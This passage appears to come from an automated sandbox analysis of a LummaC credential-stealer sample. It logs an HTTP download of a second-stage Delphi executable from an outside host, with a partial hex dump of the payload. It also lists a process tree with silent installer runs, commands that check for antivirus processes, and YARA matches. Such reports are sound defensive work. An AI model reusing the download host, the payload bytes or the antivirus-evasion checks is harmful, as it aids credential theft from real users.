                                                                                                                                    Data Ascii: 84DnfpmoYLP6W+XMx16ymaAeDcNeqM58cnaLay3PvCL8ZVDMvvpDEdzcoovAbRdbVdz7dZg/yNplUB0NO91bFHqX4rxvPof2DG0iyTTdMRoi+UpEHIoMWhU0qMgvDZpw38Pgq0
                                                                                                                                    2025-01-01 15:54:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    8192.168.2.549983188.114.97.34436464C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2025-01-01 15:54:08 UTC207OUTGET /int_clp_8888.txt HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                    Host: klipjarifaa.shop
                                                                                                                                    2025-01-01 15:54:09 UTC899INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 01 Jan 2025 15:54:08 GMT
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Content-Length: 8856972
                                                                                                                                    Connection: close
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    ETag: "c89c55fe25372bfbf8b9264a647c144b"
                                                                                                                                    Last-Modified: Sat, 28 Dec 2024 20:45:06 GMT
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbAWjcHDuPyfa4z4P6XmRl0QuZ%2Fdls%2FXZq7gSeC4V8Uq5AyNhR2wvaydOjgxGJwAME6yfJbL5yOjAqj7hYSecwfLLxY5b9Ge6ghG1s6IqhIUZv5YISH0dmKQtcs0vWNIF9Pw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8fb3afacf9d743e7-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2113&min_rtt=2094&rtt_var=823&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2866&recv_bytes=821&delivery_rate=1300089&cwnd=226&unsent_bytes=0&cid=37b9d9c9d0ce9a2d&ts=322&x=0"
                                                                                                                                    2025-01-01 15:54:09 UTC470INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00
                                                                                                                                    Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74
                                                                                                                                    Data Ascii: RESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Dat
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54
                                                                                                                                    Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassT
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81
                                                                                                                                    Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53
                                                                                                                                    Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TS
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29
                                                                                                                                    Data Ascii: truction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00
                                                                                                                                    Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d 40 00 43 00 f4 ff 65 3d 40 00
                                                                                                                                    Data Ascii: @~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=@Ce=@
                                                                                                                                    2025-01-01 15:54:09 UTC1369INData Raw: 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03
                                                                                                                                    Data Ascii: Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb(JCopy


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:10:50:59
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\Desktop\qnUFsmyxMm.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\qnUFsmyxMm.exe"
                                                                                                                                    Imagebase:0x910000
                                                                                                                                    File size:2'462'720 bytes
                                                                                                                                    MD5 hash:A00F1411626BDF8860A00A2EE9F77709
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858829409.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3872846044.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3894490335.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3894545007.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858760884.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3979712058.00000000006F2000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3868669756.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3868587610.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.3858599222.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:10:54:14
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
                                                                                                                                    Imagebase:0x290000
                                                                                                                                    File size:8'856'972 bytes
                                                                                                                                    MD5 hash:C89C55FE25372BFBF8B9264A647C144B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 51%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:10:54:16
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-63CPD.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$1044E,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe"
                                                                                                                                    Imagebase:0x290000
                                                                                                                                    File size:3'367'424 bytes
                                                                                                                                    MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:10:54:16
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
                                                                                                                                    Imagebase:0x290000
                                                                                                                                    File size:8'856'972 bytes
                                                                                                                                    MD5 hash:C89C55FE25372BFBF8B9264A647C144B
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:10:54:17
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-KVFA4.tmp\GWFNGPZJFQA2LD103N7W76JNMRKLK.tmp" /SL5="$20474,7875736,845824,C:\Users\user\AppData\Local\Temp\GWFNGPZJFQA2LD103N7W76JNMRKLK.exe" /VERYSILENT
                                                                                                                                    Imagebase:0x620000
                                                                                                                                    File size:3'367'424 bytes
                                                                                                                                    MD5 hash:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:10:54:44
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"timeout" 9
                                                                                                                                    Imagebase:0x7ff790860000
                                                                                                                                    File size:32'768 bytes
                                                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:9
                                                                                                                                    Start time:10:54:44
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:10
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:11
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:12
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:13
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "wrsa.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:14
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:15
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:16
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:10:54:53
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "opssvc.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
